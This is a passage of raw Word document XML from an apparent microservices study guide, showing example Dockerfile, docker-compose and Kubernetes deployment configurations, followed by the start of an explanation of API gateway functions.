    <w:p w14:paraId="060D2284" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Steps using Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F1DE0C" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create Dockerfile for Each Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E03FC3" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="315"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Define a Dockerfile for each microservice, specifying the base image, dependencies, and how to run the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFAE7AB" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Dockerfile for User Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAF6215"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Use an official Node.js runtime as a parent image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555291C0"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node:14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE4F96"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930095B"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Set the working directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3B60F"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WORKDIR /usr/src/app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CC3AAA"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9F33DBD"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Copy package.json and install dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394350D"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COPY package*.json ./</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C4392C"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RUN npm install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD213CA"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F4E1F2C"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Copy the rest of the application code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530EBF50"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COPY . .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CE4237"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ECF363C"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Expose the port the app runs on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E60782F"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EXPOSE 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EF7B7D"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F615124"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Define the command to run the app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237286AE"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CMD ["node", "server.js"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA58851" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Build and Run Containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B73BB" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="315"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Build container images and run containers for each microservice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF7CD36"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Build the User Service image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F88752B"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docker build -t user-service .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6103E9AE"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E28AA2D"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Run the User Service container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291564C1"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docker run -d -p 3000:3000 user-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C702E0" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Docker Compose for Local Development</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C61F25" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="315"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Define a docker-compose.yml file to manage multi-container deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A5AB21" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example docker-compose.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DACB6"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version: '3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F27A1A6"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services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E714DEC"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user-service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC730E0"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build: ./user-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AAC88E"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DCDEDB"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"3000:3000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195E4749"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order-service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E1792F"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build: ./order-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F2ECB8"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26703739"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"3001:3001"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A033A3C"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notification-service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DDCFF0"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build: ./notification-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607EF03E"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3745C"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"3002:3002"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B23AE3C"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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E01235"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Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59275B76"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Start all services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ECA066"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docker-compose up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D23D6C" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deploy Using Orchestration Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298B464E" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="315"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Kubernetes to deploy containers in production. Define deployment configurations, services, and other resources in Kubernetes manifests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F14F1BB" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Kubernetes Deployment for User Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED4B0B"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apiVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A64ACDA"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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13480875"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D791B23"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name: user-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A12F51E"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04524CDB"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replicas: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645B0F93"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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14716614"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matchLabels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D65C16A"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app: user-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B9E989"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template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E40E112"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A074124"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labels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535AAE23"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app: user-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D7470F"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CDFC30"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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50B34C"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name: user-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FB6018"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image: user-service:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA271BB"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F1D3D2" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C1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 containerPort: 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B0C19B" w14:textId="77777777" w:rsidR="0018537F" w:rsidRPr="00DA2F32" w:rsidRDefault="0018537F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D67C5BB" w14:textId="73001040" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc178383297"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the role of API gateways</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="4D511C57" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>API Gateways</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a critical component in modern microservices architectures. They serve as a single entry point for client requests and manage the communication between clients and microservices. Here’s an in-depth look at what API gateways are, their functions, and their benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB92579" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is an API Gateway?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DF7410" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>An API gateway is a server that acts as an intermediary between clients and backend services (microservices). It consolidates various API calls, handles routing, and performs additional functions such as authentication, logging, and request transformation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F74733D" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Functions of an API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7175B470" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B981F41" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Directs client requests to the appropriate microservice based on the request URL, HTTP method, or other criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F3D01D" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Aggregation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1583B7AA" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Combines responses from multiple microservices into a single response to reduce the number of client requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929A10A" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Authentication and Authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D13E3E2" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Manages and enforces security policies, including authenticating users and authorizing access to specific resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1A3AA2" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C48110B" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
